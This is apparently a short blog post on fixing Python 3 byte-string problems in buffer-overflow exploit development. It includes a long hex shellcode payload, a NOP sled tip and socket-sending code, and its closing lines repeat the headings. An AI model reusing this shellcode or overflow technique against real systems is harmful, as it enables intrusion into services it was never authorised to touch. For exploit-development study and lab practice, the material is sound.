December 5, 2019

Fix Python3 exploit development extra C2 issue

1. Remove extra C2 character

Let say we have a payload like this:

    payload = "\xba\xfd\x65\x20\x02\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" + \
              "\x52\x83\xc6\x04\x31\x56\x0e\x03\xab\x6b\xc2\xf7\xaf\x9c\x80" + \
              "\xf8\x4f\x5d\xe5\x71\xaa\x6c\x25\xe5\xbf\xdf\x95\x6d\xed\xd3"

In python2, we can send it directly to the server without any encoding, since it default send as byte code.

But in python3, things changed.
We need to use b for the annotation to state its a byte string like this.

    payload = b"\xba\xfd\x65\x20\x02\xdb\xc5\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" + \
              b"\x52\x83\xc6\x04\x31\x56\x0e\x03\xab\x6b\xc2\xf7\xaf\x9c\x80" + \
              b"\xf8\x4f\x5d\xe5\x71\xaa\x6c\x25\xe5\xbf\xdf\x95\x6d\xed\xd3" + \
              b"\x5e\x23\x05\x67\x12\xec\x2a\xc0\x99\xca\x05\xd1\xb2\x2f\x04" + \
              b"\x51\xc9\x63\xe6\x68\x02\x76\xe7\xad\x7f\x7b\xb5\x66\x0b\x2e" + \
              b"\x29\x02\x41\xf3\xc2\x58\x47\x73\x37\x28\x66\x52\xe6\x22\x31" + \
              b"\x74\x09\xe6\x49\x3d\x11\xeb\x74\xf7\xaa\xdf\x03\x06\x7a\x2e" + \
              b"\xeb\xa5\x43\x9e\x1e\xb7\x84\x19\xc1\xc2\xfc\x59\x7c\xd5\x3b" + \
              b"\x23\x5a\x50\xdf\x83\x29\xc2\x3b\x35\xfd\x95\xc8\x39\x4a\xd1" + \
              b"\x96\x5d\x4d\x36\xad\x5a\xc6\xb9\x61\xeb\x9c\x9d\xa5\xb7\x47" + \
              b"\xbf\xfc\x1d\x29\xc0\x1e\xfe\x96\x64\x55\x13\xc2\x14\x34\x7c" + \
              b"\x27\x15\xc6\x7c\x2f\x2e\xb5\x4e\xf0\x84\x51\xe3\x79\x03\xa6" + \
              b"\x04\x50\xf3\x38\xfb\x5b\x04\x11\x38\x0f\x54\x09\xe9\x30\x3f" + \
              b"\xc9\x16\xe5\x90\x99\xb8\x56\x51\x49\x79\x07\x39\x83\x76\x78" + \
              b"\x59\xac\x5c\x11\xf0\x57\x37\x14\x0e\x57\x73\x40\x12\x57\x6a" + \
              b"\xcd\x9b\xb1\xe6\xfd\xcd\x6a\x9f\x64\x54\xe0\x3e\x68\x42\x8d" + \
              b"\x01\xe2\x61\x72\xcf\x03\x0f\x60\xb8\xe3\x5a\xda\x6f\xfb\x70" + \
              b"\x72\xf3\x6e\x1f\x82\x7a\x93\x88\xd5\x2b\x65\xc1\xb3\xc1\xdc" + \
              b"\x7b\xa1\x1b\xb8\x44\x61\xc0\x79\x4a\x68\x85\xc6\x68\x7a\x53" + \
              b"\xc6\x34\x2e\x0b\x91\xe2\x98\xed\x4b\x45\x72\xa4\x20\x0f\x12" + \
              b"\x31\x0b\x90\x64\x3e\x46\x66\x88\x8f\x3f\x3f\xb7\x20\xa8\xb7" + \
              b"\xc0\x5c\x48\x37\x1b\xe5\x78\x72\x01\x4c\x11\xdb\xd0\xcc\x7c" + \
              b"\xdc\x0f\x12\x79\x5f\xa5\xeb\x7e\x7f\xcc\xee\x3b\xc7\x3d\x83" + \
              b"\x54\xa2\x41\x30\x54\xe7" + b"B" * 100

Otherwise it will contains extra C2 characters after \x80 .

2. Include `b"\x90" * 8` for buffer overflow exploit

We have to add extra \x90 after the jmp address to state is no operation.
See more about what is \x90 here.

https://en.wikipedia.org/wiki/NOP_(code)

3. In socket programming, you can send directly byte string but not utf string, need to be encoded.


my_socket.connect((host, port))

my_socket.send("USER a\n\r".encode())  # You need to encode the string into byte string
print("receive" + my_socket.recv(2048).decode())

message = b"A"

print(message) # byte string is accepted, no need to encode
my_socket.send(message)

Fix Python3 exploit development extra C2 issue

1. Remove extra C2 character

2. Include b"\x90" * 8 for buffer overflow exploit

3. In socket programming, you can send directly byte string but not utf string, need to be encoded.

2. Include `b"\x90" * 8` for buffer overflow exploit